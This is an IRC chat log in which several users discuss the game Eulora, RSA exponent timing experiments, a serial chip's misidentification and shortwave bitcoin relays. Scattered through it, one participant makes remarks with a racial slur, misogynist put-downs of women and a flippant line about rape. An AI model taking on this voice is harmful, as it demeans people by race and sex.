break's over, back to work"\ 1735844;1510322537;diana_coman;asciilifeform, eulora is a way to get btc; no tits required either 1735845;1510322585;asciilifeform;anybody made a whole coin yet ? 1735846;1510322616;asciilifeform;or how many centuries that would take ? 1735847;1510322644;asciilifeform;( to be fair, i did not think that the coin were supposed to be the appeal ) 1735848;1510322857;diana_coman;asciilifeform, iirc several people exchanged their ecu for btc and cashed out though no idea how much it was exactly (they usually come in with "will make whole coin!!!111 won't quit!!!" and then crash out of it a few days later) 1735849;1510323050;diana_coman;recently 1 ECu = 10 satoshi so arguably it takes longer now to process same value in game, yes; but dunno about centuries and it certainly was NOT this that held people away until now, you know 1735850;1510323055;asciilifeform;i'll concede that eulora apparently does yield nonzero coin, for someody. but i must also admit that, tho i respect the work of diana_coman , mircea_popescu , et al, i dun particularly digest mmporgs ( or even play much game at all any moar ) 1735851;1510323060;diana_coman;ugh, the other way around 1735852;1510323066;diana_coman;1 satoshi = 10ECu 1735853;1510323153;asciilifeform;when i sit to play a game, it feels like dereliction of duty, with, e.g., ffa yet undone, dulap not yet replaces, scintollator rng not complete, 9000 other processes 1735854;1510323158;diana_coman;asciilifeform, funny enough I'd say the chief complaint is precisely that "it's not mmorpg as we know it" 1735855;1510323176;asciilifeform;i can't even tetris no moar, diana_coman 1735856;1510323182;asciilifeform;much less eulora. 1735857;1510323201;asciilifeform;i suspect that i recycled that part of my head. 1735858;1510323239;diana_coman;eh, eulora play means 15 minutes per day deciding what to do and giving task to bot; but I get the idea, I'm not pushing it on anyone really 1735859;1510323282;asciilifeform;yea i did get the 'core wars' flavour from the bot thing 1735860;1510323291;asciilifeform;it sounds neat 1735861;1510323538;asciilifeform;in unrelated lulz, bch shitcoin pumped back by someone, to august price 1735862;1510323540;diana_coman;in other news: data collection on rsa with random co-prime e and then with random prime e almost ready; at first glance on co-prime encryption:decryption times are as expected approx 4:1 (crt); with prime e the ratio is more like 2:1 1735863;1510323560;diana_coman;will write it up properly and publish the whole thing these days but this is first glance at it so feel free to comment 1735864;1510323581;asciilifeform;diana_coman: that sounds rather like what you would expect, neh 1735865;1510323586;asciilifeform;the ratios 1735866;1510323590;diana_coman;aha 1735867;1510323615;diana_coman;key generation takes ofc more for prime e than merely co-prime 1735868;1510323650;asciilifeform;did you actually factor the nonprime e, to crtize ? 1735869;1510323657;asciilifeform;or why would the ratio there differ 1735870;1510323717;asciilifeform;( gpg-mpi's mod exp doesnt do anything special with composite exponents, that would automatically speed the op ) 1735871;1510323940;asciilifeform;btw i had a lulzy idea re public exponents 1735872;1510323975;asciilifeform;they're, well, public. ergo could easily be , say, nextprime(commentstring) 1735873;1510324005;asciilifeform;or any other user-controlled field . 1735874;1510324007;diana_coman;asciilifeform, tbh that's why I've wrote it down here as I'm not really sure why that difference; I did not do any additional factorising or anything 1735875;1510324026;diana_coman;existing koch-rsa, simply once with co-prime e, the other time with prime e 1735876;1510324032;asciilifeform;pretty odd. 1735877;1510324042;asciilifeform;paste the code ? 1735878;1510324066;diana_coman;I looked through the relevant mpi part but I can't say I get it to that degree to be able to figure this out 1735879;1510324072;diana_coman;what part of code ? 1735880;1510324078;asciilifeform;yours 1735881;1510324078;diana_coman;the rsa is same as last time 1735882;1510324094;asciilifeform;the different from last experiment, part. 1735883;1510324293;asciilifeform;( moar formally for http://btcbase.org/log/2017-11-10#1735872 : pub exp for asciilifeform would be equal to nextprime(keccak4096('asciilifeform pithy comment and current postage etc')) 1735884;1510324293;a111;Logged on 2017-11-10 14:26 asciilifeform: they're, well, public. ergo could easily be , say, nextprime(commentstring) 1735885;1510324302;diana_coman;asciilifeform, this bit I suppose http://p.bvulpes.com/pastes/I4TGT/?raw=true 1735886;1510324384;asciilifeform;hmm 1735887;1510324416;asciilifeform;i'ma think, over cup of tea, re why the diff 1735888;1510324529;*;asciilifeform brb 1735889;1510324645;diana_coman;eh asciilifeform nevermind, I'm silly 1735890;1510324680;diana_coman;e there is half the bits so 2048 instead of 4096 1735891;1510324712;diana_coman;so yes, unsurprising; switched it to 4096 bits and time jumped accordingly to ~4 instead of ~2 1735892;1510325108;diana_coman;will collect full data set on this proper too and then see what it shows exactly 1735893;1510326401;mircea_popescu;http://btcbase.org/log/2017-11-10#1735820 << because everyone's preoccupation in fiatlands is how to force people to "upgrade". cars, serial chips, whatever. 1735894;1510326401;a111;Logged on 2017-11-10 10:14 diana_coman: for the curious there are in fact 2 prolific-stamped documents describing pl2303 and pl2303x; pl2303x seems to be a sort of upgrade to 64bits but why couldn't it be properly identified as distinct I don't know 1735895;1510326421;mircea_popescu;and the very naive idea that sort of mind comes to is that "if i deny labels to realities i don't like they'll not exist". 1735896;1510326427;mircea_popescu;which works about as well as anything else they do. 1735897;1510326482;mircea_popescu;http://btcbase.org/log/2017-11-10#1735827 << yeah, BUT IT IS BACKWARDS COMPATIBLE!!! with windows. 1735898;1510326482;a111;Logged on 2017-11-10 13:44 asciilifeform: pc is epic piece of shit, with modern vlsi it could have 50 working uarts for a few cents. instead ships with 0 1735899;1510326525;mircea_popescu;http://btcbase.org/log/2017-11-10#1735834 << hey, sometimes the obvious bears repeating. 1735900;1510326525;a111;Logged on 2017-11-10 13:53 asciilifeform: http://btcbase.org/log/2017-11-10#1735812 << noshit.jpg, it works for kicking people out of номенклатура , and this dun work if yer not in it to begin with 1735901;1510326551;mircea_popescu;don't join the politruks, don't have politruk problems later on. also, http://trilema.com/2015/heres-what-they-dont-tell-you-when-they-bring-you-those-papers-to-sign/ 1735902;1510326595;mircea_popescu;(yes, "a plea bargain" has nothing to do with justice or anything else. it is simply a contract with a theatrical company, you agree to play a role on the lowest rung. it's exactly like 1950s hollywood system signing up to be an extra. you will be... an extra... in someone else's movie... about shit that interests them.) 1735903;1510326688;mircea_popescu;http://btcbase.org/log/2017-11-10#1735837 << boys go to war or go away ; also, nobody asks you to sell your bitcoin. sell the worthless things, such as tits, not the valuable things. 1735904;1510326688;a111;Logged on 2017-11-10 13:56 asciilifeform: http://btcbase.org/log/2017-11-10#1735807 << lol not everybody has titz ( and some have already fired theirs !1) 1735905;1510326747;mircea_popescu;http://btcbase.org/log/2017-11-10#1735842 << substantially different. you could have also won. they -- CAN NOT. it's not "oh, i have a choice between republic and mundane life". there is no possible result from mundane life. 1735906;1510326747;a111;Logged on 2017-11-10 14:01 asciilifeform: http://btcbase.org/log/2017-11-10#1735810 << this isnt any sadder than , e.g., the 5 whole coinz asciilifeform lost in the alphago thing. or the infamous toyota, etc 1735907;1510326752;mircea_popescu;stipendi peccatus mors est. 1735908;1510326998;mircea_popescu;http://btcbase.org/log/2017-11-10#1735846 << as a forinstance : http://logs.minigame.bz/2016-08-07.log.html#t03:03:56 iirc he evaluated it at 5 to 10 btc due to market values of items, is a post somewhere on his blog ; historically the largest pop was something like 180mn ecu, ie 1.8 btc and it didn't take 1/10 that. 1735909;1510326998;a111;Logged on 2017-11-10 14:03 asciilifeform: or how many centuries that would take ? 1735910;1510326999;lobbesbot;Logged on 2016-08-07 03:03:56: (22:35:16) >Daniel has got 0.81 BTC worth of Boulder and assorted loot while building. Congratulations! 1735911;1510327006;mircea_popescu;so yes, plenty of people made plenty of coins. 1735912;1510327060;mircea_popescu;if you look in the reports, for instance, http://trilema.com/2017/minigame-smg-july-august-2017-statement/#footnote_1_74351 that's 1.2576509 players gained that month. 1735913;1510327072;mircea_popescu;well, interval. 1735914;1510327150;mircea_popescu;http://btcbase.org/log/2017-11-10#1735853 << eulora is a very different kind of game ; not wow at all. it's not cocaine for the clickchicken, keep it glued to the screen clucking away ; it's amphetamine for the thinker, "shit how to make a bot that properly does this". 1735915;1510327150;a111;Logged on 2017-11-10 14:12 asciilifeform: when i sit to play a game, it feels like dereliction of duty, with, e.g., ffa yet undone, dulap not yet replaces, scintollator rng not complete, 9000 other processes 1735916;1510327234;mircea_popescu;http://btcbase.org/log/2017-11-10#1735855 << yes, buit this is the core of the misunderstanding. "i can't even masturbate anymore, much less have a relationship". relationships aren't a sort of masturbation and eulora isn't a sort of tetris. 1735917;1510327234;a111;Logged on 2017-11-10 14:12 asciilifeform: i can't even tetris no moar, diana_coman 1735918;1510327263;mircea_popescu;http://btcbase.org/log/2017-11-10#1735861 << while supplies last... 1735919;1510327263;a111;Logged on 2017-11-10 14:18 asciilifeform: in unrelated lulz, bch shitcoin pumped back by someone, to august price 1735920;1510327302;mircea_popescu;http://btcbase.org/log/2017-11-10#1735872 << could but why bother. 1735921;1510327302;a111;Logged on 2017-11-10 14:26 asciilifeform: they're, well, public. ergo could easily be , say, nextprime(commentstring) 1735922;1510327806;asciilifeform;ah lol looks like diana_coman found the wtf 1735923;1510327818;asciilifeform;( was outside of the pasted material ) 1735924;1510327878;mircea_popescu;aha, smaller exponent. as per usual!!1 1735925;1510327886;asciilifeform;lol 1735926;1510327897;asciilifeform;http://btcbase.org/log/2017-11-10#1735902 << phunphakt: the 'satanic abuse' folx are still sitting in jail. 1735927;1510327897;a111;Logged on 2017-11-10 15:09 mircea_popescu: (yes, "a plea bargain" has nothing to do with justice or anything else. it is simply a contract with a theatrical company, you agree to play a role on the lowest rung. it's exactly like 1950s hollywood system signing up to be an extra. you will be... an extra... in someone else's movie... about shit that interests them.) 1735928;1510327905;mircea_popescu;im sure. 1735929;1510327914;asciilifeform;( nfi if specifically because plead, or not , tho ) 1735930;1510327924;mircea_popescu;convincing actor gets used ; whether convincing or not partly in public's hands. 1735931;1510327937;diana_coman;asciilifeform, it's actually IN the pasted material; that nbits/2 , lol 1735932;1510327943;mircea_popescu;lol 1735933;1510327962;asciilifeform;well nao , after tea, and when rubbed in my face -- i see, lel 1735934;1510327973;mod6;mornin 1735935;1510327976;mircea_popescu;low reading comprehensions!! 1735936;1510327977;asciilifeform;heya mod6 1735937;1510327979;diana_coman;morning mod6 1735938;1510327982;mod6;:] 1735939;1510327986;mod6;how goes! 1735940;1510328006;mircea_popescu;in otehr breakfast cereals, girl picked up an... redskin chick yest. 1735941;1510328016;mircea_popescu;i had thought it's a movie prop, but apparently no, can has irl. 1735942;1510328034;asciilifeform;i also thought it was from red paste or the like 1735943;1510328042;asciilifeform;or at the very least sunburns. 1735944;1510328048;mircea_popescu;pretty hawt, tbh.\ 1735945;1510328103;mircea_popescu;just when i was starting to think, you know, i have a serious sex-race issue "white or mulatto but nothing else" it turns out that there exists palatable nonwhiteness. 1735946;1510328125;asciilifeform;http://btcbase.org/log/2017-11-10#1735920 << may or may not want to bother, but it does give a method of protocolically tying the comment (postage whatever) string to the pubkey , without pretense of 'self-signatures' or anything of the kind 1735947;1510328125;a111;Logged on 2017-11-10 15:21 mircea_popescu: http://btcbase.org/log/2017-11-10#1735872 << could but why bother. 1735948;1510328164;asciilifeform;and (m,comment) is shorter, in principle, than (m,e,comment) . 1735949;1510328175;asciilifeform;but this is imho muchly a matter of taste. 1735950;1510328176;mircea_popescu;asciilifeform in my spec the comment in e, N, comment is arbitrary ~to storer~, not to originator. 1735951;1510328190;mircea_popescu;perfectrly fine for my key via deedbot and via say your putative deedbot` to come with different comments. 1735952;1510328196;mircea_popescu;moreover, intended functioning. 1735953;1510328214;asciilifeform;well anyone can attach labels to outside of the bottle in his own shelf, regardless of what gets put in the spec 1735954;1510328222;mircea_popescu;this is how one guards against idiocies such as "put my picture in comment field". 1735955;1510328227;mircea_popescu;go, put, put, see who keeps. 1735956;1510328237;mircea_popescu;asciilifeform absolutely. 1735957;1510328267;asciilifeform;so imho if comment is not part of the moving parts ( as in say the proposed exponent scheme above ) then there's no particular reason to mention it in the spec 1735958;1510328287;mircea_popescu;in any case : now that we understand the bitcoi nnoide problem, we can't be excused from implementing it like satoshi did. so : no arbitrary comment field of unspecified size "everyone has to keep" arbitrary to originator. 1735959;1510328301;asciilifeform;'infinite' sizes are a lol 1735960;1510328319;mircea_popescu;it is part of the moving parts, "there is a hole here". what one fills it with is his problem, but the hole is. 1735961;1510328376;asciilifeform;notion was, why not make e := nextprime(contents of hole) . naturally hole would be (4096 bits) or (up to 4096 bits), take yer pick 1735962;1510328394;mircea_popescu;possibly too narrow. 1735963;1510328533;asciilifeform;it's a public exponent. but it does break my http://btcbase.org/log/2017-11-07#1733387 . 1735964;1510328533;a111;Logged on 2017-11-07 16:38 asciilifeform: in particular, gotta show that no two inputs will produce the same prime 1735965;1510328544;asciilifeform;and probably also http://btcbase.org/log/2017-11-07#1733390 . 1735966;1510328544;a111;Logged on 2017-11-07 16:39 asciilifeform: also gotta show that no prime exists , in the given bitness width, that CANNOT be chosen. 1735967;1510328561;asciilifeform;( at least if using nextprime(keccak(comment)) ) 1735968;1510328561;mircea_popescu;heck, hash it first 1735969;1510328562;mircea_popescu;:D 1735970;1510328567;asciilifeform;well specifically then 1735971;1510328584;asciilifeform;if ~not~ hashing, then it theoretically meets the condition ( for so long as the comment is permitted to be binary garbage if it wants ) 1735972;1510328592;mircea_popescu;but it isn't. 1735973;1510328594;mircea_popescu;ascii or go home. 1735974;1510328671;asciilifeform;actually , the way i'd implement the thing , is to not change the format in any way, other than a condition that 1) e can be any 4096b string 2) but if it fails m-r, nextprime(e) is used as e 1735975;1510328695;asciilifeform;this would let whoever wants put 'hello world' etc as the e. and if do not want, to do exactly same thing we already discussed. 1735976;1510328701;mircea_popescu;really makes no diff. 1735977;1510328708;asciilifeform;not mega-difference, no. 1735978;1510328790;asciilifeform;( if your e is already prime, nothing interesting happens. but if someone insists of making a text 'part of the key', he can stuff it into the e ) 1735979;1510328834;mircea_popescu;not really becauyse a) user doesn't care and b) user with e can't get message back anyway 1735980;1510328846;asciilifeform;anyway i agree with mircea_popescu , there is no reason to have any of this in the moving gears. who wants a 'text commented e', can take his text, find nextprime(text) himself in such a way that it still human-reads, and use that. 1735981;1510328883;asciilifeform;sorta like the vanity btc addrs thing. 1735982;1510328911;mircea_popescu;!!up can aww no candi ? 1735983;1510328911;deedbot;can voiced for 30 minutes. 1735984;1510328923;asciilifeform;lol 1735985;1510328944;mircea_popescu;iirc there was an isprime implemented, now i'm curious re 13371337 and similarily appended-1337-strings whether prime or not 1735986;1510328958;mircea_popescu;"which is the count of repetitions before string x becomes prime number" 1735987;1510328974;mircea_popescu;^ incidentally not idle number theory question 1735988;1510328982;asciilifeform;^ prolly has noanswer 1735989;1510328991;mircea_popescu;asciilifeform think :D 1735990;1510329000;mircea_popescu;4545 = 45 * 101 1735991;1510329009;asciilifeform;aa lol this is the mirrorolade thing again 1735992;1510329014;mircea_popescu;bwahjahaha 1735993;1510329113;asciilifeform;http://btcbase.org/log/2017-11-10#1735914 << yea , hence asciilifeform's 'core wars' comment 1735994;1510329113;a111;Logged on 2017-11-10 15:19 mircea_popescu: http://btcbase.org/log/2017-11-10#1735853 << eulora is a very different kind of game ; not wow at all. it's not cocaine for the clickchicken, keep it glued to the screen clucking away ; it's amphetamine for the thinker, "shit how to make a bot that properly does this". 1735995;1510329134;mircea_popescu;there's a lot to be yet said on the mystical value of rsa. take a "prime" - purely mystical concept, it literally means "was not seen before, virginal." "repetitions can not FOR THAT REASON ever be prime" and so on. 1735996;1510329136;asciilifeform;( fwiw asciilifeform never played 'normal' mmporgs , but has a vague notion that even there, people eventually made bots ) 1735997;1510329150;mircea_popescu;asciilifeform definitely. tho i did enjoy say rift. 1735998;1510329165;mircea_popescu;for the purely visual, "let's play movie" non-game content-consuming thing. 1735999;1510329197;mircea_popescu;(play is VERY different from content consumption, the latter is a bovine activity well suited to philosophers and girls of room temp iq while the former is the principal activity of the kitten.) 1736000;1510329215;asciilifeform;that part imho is pretty obvious 1736001;1510329237;mircea_popescu;the part that's incomprehensible is why the fuck the content-consumption mmorpg isn't all about tits 1736002;1510329239;mircea_popescu;oh... wait! 1736003;1510329275;mircea_popescu;well, good thing the "feminist" retards that don't understand anything ABOUT ANYTHING! (paging here Framedragger ) "fixed" the problem of girl armor in cc-mmorpgs! 1736004;1510329299;asciilifeform;wat's 'girl armor' 1736005;1510329304;mircea_popescu;as far as i'm concerned, engaging in a "fixing" of the nature of "cut branch underfoot" is a very strong signal of idiocy. 1736006;1510329339;mircea_popescu;asciilifeform that mysticalname whatsherface chick from tor that trinque has a hard-on on at some point wrote a "scholarly" (in the wikitardia sense of the term) article about how girl armor displayed in mmorpgs and bad hbo franchises "wouldn't work". 1736007;1510329351;asciilifeform;aaa 1736008;1510329364;asciilifeform;iirc it was Framedragger with the hard 1736009;1510329385;mircea_popescu;the low level problem of just how idiotically superficial her arguments were paling in comparison to the incomprehensible levels of confusion involved in "i'll fix amphora, problem with it is that it has a hole" and other fundamental miscomprehensions of function. 1736010;1510329397;mircea_popescu;asciilifeform i am an old man and my memory is self-serving. 1736011;1510329406;asciilifeform;lol 1736012;1510329487;asciilifeform;reminds me, asciilifeform dreamed at night that he had a time travel widget, but used it strictly to go back in time to now-defunct labs he worked in, to borrow tools. but one time forgot to return ! and was trapped, forever, in a loop, consisting of lunch break among technodetritus. 1736013;1510329524;asciilifeform;* forgot to return a tool 1736014;1510329565;mircea_popescu;this is pretty good punishment 1736015;1510329573;asciilifeform;ikr? 1736016;1510329597;mircea_popescu;if you ever take up bitcoin, you'll find to your surprise it's not that different! 1736017;1510329607;asciilifeform;lol 1736018;1510329619;mircea_popescu;http://btcbase.org/log/2017-11-09#1735499 << as fine example as can be had. 1736019;1510329619;a111;Logged on 2017-11-09 19:32 ang-st: well i have some not to be release numbers that would prove you wrong :) 1736020;1510329666;asciilifeform;i suppose being condemned to wish forever it were 2010, is nearly as good a hell as to be stuck in actual 2010 1736021;1510329759;mircea_popescu;worse. it's always better to be raped than trapped, the former washes off. 1736022;1510329788;mircea_popescu;("washing off" here has a very strict art meaning -- "i'm the object, not the subject" is the strongest psychological defense yet devised by the human brain.) 1736023;1510329818;mircea_popescu;which is why being hated and the force of gravity don't elicit the same emotional response in humans. 1736024;1510329885;asciilifeform;dunno, people - esp. the very dim -- have quite strong ability to 'animate the inanimate' and e.g. declare 'war on $substance' etc 1736025;1510329898;mircea_popescu;sure, goes both ways. 1736026;1510329975;asciilifeform;tangentially, asciilifeform has this strong recollection of reading a version where xerx whipped the sea ~as a psyop~, and meanwhile had men crossing elsewhere. but i can't seem to find this in herodotus. so where was it ? 1736027;1510329995;mircea_popescu;i dun recall reading it ; sounds sven husserlish 1736028;1510330018;asciilifeform;i dun think i dreamed it. it was somewhere. 1736029;1510330138;asciilifeform;http://btcbase.org/log/2017-11-10#1735903 << ftr asciilifeform has never yet sold ( in the trade-for-fiatolade sense ) any qty of bitcoin . 1736030;1510330138;a111;Logged on 2017-11-10 15:11 mircea_popescu: http://btcbase.org/log/2017-11-10#1735837 << boys go to war or go away ; also, nobody asks you to sell your bitcoin. sell the worthless things, such as tits, not the valuable things. 1736031;1510330155;mircea_popescu;so good for you. 1736032;1510330170;asciilifeform;very much case of 'write only memory' 1736033;1510330323;asciilifeform;http://btcbase.org/log/2017-11-10#1735893 >> see also of interest re diana_coman's find >> http://lonnberg.mbnet.fi/pl2303x.html 1736034;1510330323;a111;Logged on 2017-11-10 15:06 mircea_popescu: http://btcbase.org/log/2017-11-10#1735820 << because everyone's preoccupation in fiatlands is how to force people to "upgrade". cars, serial chips, whatever. 1736035;1510330334;asciilifeform;'The PL-2303X has the same vendor ID and product ID as the older PL-2303, which means that it will be incorrectly detected as a PL-2303 by the driver currently in the Linux kernel. Attempting to use a PL-2303X as a PL-2303 simply results in an inability to transfer data through the serial port. In other words, nothing happens.' 1736036;1510330357;asciilifeform;what isn't clear to me tho is why the perpetrator found it necessary to commit this atrocity 1736037;1510330370;mircea_popescu;"necessary". 1736038;1510330374;asciilifeform;the '64bitness' is red herring, my 16550 uarts worked ok under msdos 5 and work just same today 1736039;1510330436;mircea_popescu;understand something : the petty criminal holding you up didn't "find it necessary". petty crime comes with built-in, very lowly set high-pass filter. you have to be THIS fucking dumb to think petty crime is a productive use of your time, and consequently the bar for "necessity" isn't anywhere close to mathematical rigour. 1736040;1510330472;asciilifeform;sure, but at least it is clear how beating folx on the street with a club and taking their wallets might be enjoyable 1736041;1510330479;mircea_popescu;it is ? 1736042;1510330487;asciilifeform;well wallets sometimes contain dough 1736043;1510330487;mircea_popescu;for any reason besides you never having done it ? 1736044;1510330500;asciilifeform;i will admit to not having tried it. 1736045;1510330527;mircea_popescu;spolier : /me spent youth doing ~equivalent, it's incredibly fucking tedious. not specifically "wallets", but, load up car with weaponry and decisive men, visit rural "disco club", scandalously hit on "their" gals. 1736046;1510330534;asciilifeform;but it isn't a wholly martian thing, where 'why would anyone' question arises 1736047;1510330534;mircea_popescu;~same thing, more tnt concentration. 1736048;1510330558;mircea_popescu;asciilifeform kinda is, actually. hard fucking work, beating people up, dood. 1736049;1510330576;asciilifeform;troo: http://btcbase.org/log/2014-02-17#511630 1736050;1510330576;a111;Logged on 2014-02-17 19:21 asciilifeform: russian blogger, circa '04: 'have you ever beaten a man? had you done so, you would know that it is hard work. no less arduous than turning a meat-grinder. how often do you wake up to the urge to crank a meat-grinder? every day?' 1736051;1510330623;mircea_popescu;youth somewhat compensates, but if you're still doing it past your 20s there's mental retardation involved. 1736052;1510330645;mircea_popescu;just like if you're still wetting the bed by blair's years. 1736053;1510330657;asciilifeform;well to be fair pl2303x is prolly a work of d00dz in 20s 1736054;1510330689;mircea_popescu;so this is the whole point here, asciilifeform : the "obvious why it's enjoyable" is this retroconstructive subjective conceit. no, it's not fucking obvious. at all. why would you think it is. 1736055;1510330703;asciilifeform;( and i must sadly note, they will ~continue~ to ship with FG units, unless someone wants to suggest a different chip ) 1736056;1510330706;mircea_popescu;asciilifeform but who was managing them ? 1736057;1510330721;mircea_popescu;if neighbour's excavator grinds my azaleas, ima not gonna scream at the ~operator~ 1736058;1510330776;asciilifeform;then indeed i have nfi 1736059;1510330790;mircea_popescu;if the dumb shoe fits... 1736060;1510330803;asciilifeform;it would even make sense if order was 'make'em all install this here new winblowz turd'. but iirc 2303x did not even ~offer~ a winturd. 1736061;1510330813;asciilifeform;( hence the warning in the fg docs ) 1736062;1510331416;asciilifeform;oh hah there's at least 1 actual building in cr ! 1736063;1510331425;asciilifeform;( re mircea_popescu's latest article ) 1736064;1510331701;mircea_popescu;:p 1736065;1510331715;mircea_popescu;speaking of which, isn't that one of the better headers ? 1736066;1510331736;asciilifeform;it is, with the baobab or whatever that thing is in the americas 1736067;1510331750;mircea_popescu;yeah. /me and the tree of wisdom. 1736068;1510331767;mircea_popescu;in teh middle of a volcano, ruining everyone's shit an' having tea. 1736069;1510331994;deedbot;http://trilema.com/2017/jsm-bomba-de-costa-rica/ << Trilema - JSM, Bomba de Costa Rica 1736070;1510332352;asciilifeform;in other lulzies, https://archive.is/FWYXJ becomes https://archive.is/aw5AC . 1736071;1510332418;asciilifeform;'We just forked the website ! We didn't mean to fork Bitcoin, thats a lot of work ;)' 1736072;1510332425;mircea_popescu;hurr. 1736073;1510332454;asciilifeform;i can picture the wagner, the cyanide, of the handful of gullible folx. might explain the 'back to 300' last night. 1736074;1510332508;mircea_popescu;the what ? 1736075;1510332541;asciilifeform;pictured item appears to be 'phorq uncancelled!' then few hrs later 'haha, idjits' 1736076;1510332562;mircea_popescu;but what is "back to 300" ?> 1736077;1510332609;asciilifeform;on the shitcoin markets, a 'fork token' or what was it, denominated in heathenbux, fell from 1000s to 100, but then repumped 1736078;1510332619;asciilifeform;( link in the l0gz somewhere ) 1736079;1510332623;mircea_popescu;a a 1736080;1510332651;mircea_popescu;in other minutia, i'm holding up this well worn pair of cuffs, with red candlewax stains, and i'm thinking.... didn't i buy some pink candles too ? 1736081;1510332652;mircea_popescu;so bbl. 1736082;1510332687;asciilifeform;mircea_popescu: see also http://btcbase.org/log/2017-01-03#1595615 ! 1736083;1510332687;a111;Logged on 2017-01-03 18:09 asciilifeform: 'Вот царевна под замком / стонет сизым голубком, / слезы тяжкие роняет, / за свечой свечу вставляет... / Извела уж сто свечей, / а ничуть не легче ей.' 1736084;1510334059;asciilifeform;meanwhile in other pirates, http://www.maxmcarter.com/spark/marconi.html 1736085;1510334139;asciilifeform;'...storage capacitor holds 0.2 watt-seconds of energy... about 90%, 720,000 peak watts, delivered to the antenna... might be heard world-wide, but I don't know that for a fact... while total power in the pulses might be impressive, it's an extremely wideband signal - much less power is present on any particular, say 5 kHz, channel. In other words, the sparker is sending a very crude form of spread spectrum' 1736086;1510334161;asciilifeform;'The signal has a very subtle sound and, if not for the 3-click/delay format, would be indistinguishable from nature's own spark transmitter, distant lighting.' 1736087;1510334377;asciilifeform;incidentally re : http://btcbase.org/log/2017-11-10#1735809 << e.g. pyongyang, or teheran, or any other 'fortress' could easily make btc by transmitting arbitrary bits on shortwave, for coin 1736088;1510334377;a111;Logged on 2017-11-10 08:37 mircea_popescu: that the fucktards stubbornly refuse to do it speaks to the fucktards' utterly incredible fucktardation, not to how hard it is to get. 1736089;1510334422;asciilifeform;i'd be quite surprised if this happened and then the transmitter wasn't booked 24/7. 1736090;1510334556;asciilifeform;e.g. 'send coin to addr A, then wotpaste payload signed with originator addr, and yer 64kB chunk is on the air within 24hrs or we send coin back. signed, yours, kim chen ir' 1736091;1510336913;mircea_popescu;possibly. 1736092;1510337186;asciilifeform;betcha auctioning the bandwidth (supposing you're already in the 'fortressing' business and have the tower) is moar +ev, joule-per-joule , than mining. 1736093;1510337287;asciilifeform;( and possibly even moar +ev for opponent, to ~outbid~ than to jam, per-joule ) 1736094;1510338233;asciilifeform;now, a twist : you don't necessarily need a pyongyang. can instead use network of decisive men with smaller repeaters... 1736095;1510338274;asciilifeform;( but possibly this devolves into the scheme described by mircea_popescu much earlier . ) 1736096;1510338365;asciilifeform;principal headaches, afaik are 1) how to get payload from the buyer to the seller to begin with 2) how to settle dispute re performance ( e.g. 'you said you tx'd, but over on mauritus nobody got the signal' etc ) 1736097;1510338452;asciilifeform;(2) is prolly solvable simply by being very, very loud. but (1) i have nfi, my puny brain is not up to producing an obvious pill. 1736098;1510338701;asciilifeform;( i suppose one approach to (1) is 'buyer must be in the l1 of a repeater operator'. and possibly it is the only possible approach. but it does turn the thing from 'build it and they will come' into something like 'must push the dope' , and prolly makes whole thing unviable ) 1736099;1510338914;asciilifeform;the real boojum, i suspect, is that there is ~0 demand for anything of this kind, while the net still works ( propped up as it may be by fiatolism ) 1736100;1510338930;asciilifeform;but when it begins to fall apart -- will be 'too late to invent parachute'. 1736101;1510339092;asciilifeform;( i could be wrong -- there could be demand. would mircea_popescu personally pay to transmit something ? how much would pay ? but who else would..? ) 1736102;1510340339;mircea_popescu;asciilifeform necesarily it devolves. 1736103;1510340360;*;asciilifeform can see it. 1736104;1510340553;asciilifeform;it remains imho a puzzle, how anyone would bootstrap such a thing ( nobody would pay for 'best effort' crapola, http://btcbase.org/log/2017-11-09#1735455 ) 1736105;1510340553;a111;Logged on 2017-11-09 19:17 mircea_popescu: also support is not sought, i don't think, if by support you mean manpower as opposed to you know, cooling. (if the latter, there's really 0 interest in a "best effort dc / someone's house".) 1736106;1510340805;asciilifeform;possibly 'hey they've transmitted blocks on time, unkillably, for years, and now they're auctioning slots!' might do it. 1736107;1510340927;asciilifeform;( now that i think about it, this particular piece of relay-crackpottery might actually work very well with asciilifeform's earlier 'casks' thing , http://btcbase.org/log/2017-02-28#1619996 & elsewhere ) 1736108;1510340927;a111;Logged on 2017-02-28 13:38 asciilifeform: to wind it up, the casks algo is asciilifeform's attempt at the 'high vacuum pump' from earlier -- to get the max possible removal of something-to-allcomers element , to the extent possible without running an entirely closed wotronic system (and consequently turning into visa or swift) 1736109;1510340961;mircea_popescu;for someone who can't even tetris, what's with all the wank anyway ? 1736110;1510340985;asciilifeform;it's an algo, wat. 1736111;1510341000;asciilifeform;will quietly live in the l0gz until possibly useful. 1736112;1510341046;asciilifeform;( or at any rate refuted, and can then link to refutation when asciilifeform is long dead and some other d00d asks 'hey wai not shortwave relays' etc ) 1736113;1510341235;asciilifeform;and i'll disagree that a q re how specifically one might go about taking back telecom sovereignty from the fiatists, is necessarily a wank. 1736114;1510341536;*;asciilifeform bbl,meat 1736115;1510342245;mircea_popescu;eh you know what i mean. 1736116;1510342705;asciilifeform;yea , moar dead nazis, less kB wasted, i get. 1736117;1510342710;*;asciilifeform bbl ferrealz 1736118;1510343199;deedbot;http://trilema.com/2017/romanzo-popolare/ << Trilema - Romanzo popolare 1736119;1510345801;BingoBoingo;!~later tell phf tyvm, moving blockindex.dat over the local network fixed the issue. More nand for the burn pile. 1736120;1510345801;jhvh1;BingoBoingo: The operation succeeded. 1736121;1510346290;asciilifeform;woah shitcoin @ 0.15 1736122;1510346306;asciilifeform;( that, or epic goxolade concert ) 1736123;1510347381;BingoBoingo;asciilifeform, It's a concert. Just enjoy the music https://www.youtube.com/watch?v=3tmd-ClpJxA 1736124;1510348862;asciilifeform;https://archive.is/iFP57 << in other soon-to-be-defuncts. 1736125;1510349258;shinohai;https://blockchain.info/address/13Do2uy94HMBy1SuAYP7rbGA9s3ZbnJG7f <<< this is clean trb addy, bitpay says "invalid address" 1736126;1510349587;asciilifeform;shinohai: when fed it how ? 1736127;1510349600;asciilifeform;( i thought bitpay took btc ~in~ only , disgorged fiatola ) 1736128;1510349648;shinohai;i dunno, xhamster does it 1736129;1510352374;mircea_popescu;BingoBoingo cool. 1736130;1510359010;asciilifeform;meanwhile in 'can haz', https://www.nature.com.sci-hub.cc/articles/nature21698?WT.feed_name=subjects_electronic-devices# ( warning : pdf ) -- 'High-resolution non-destructive three dimensional imaging of integrated circuits' (march 2017) , with some quite impressive pics. 1736131;1510359051;asciilifeform;they built a sort of xray crystallography rig, for ~intact~ ic. 1736132;1510361633;BingoBoingo;mircea_popescu: It's amazing how you old point "everything costs the same everywhere" is holding true. 1736133;1510362701;BingoBoingo;!~ticker --market all 1736134;1510362707;jhvh1;BingoBoingo: 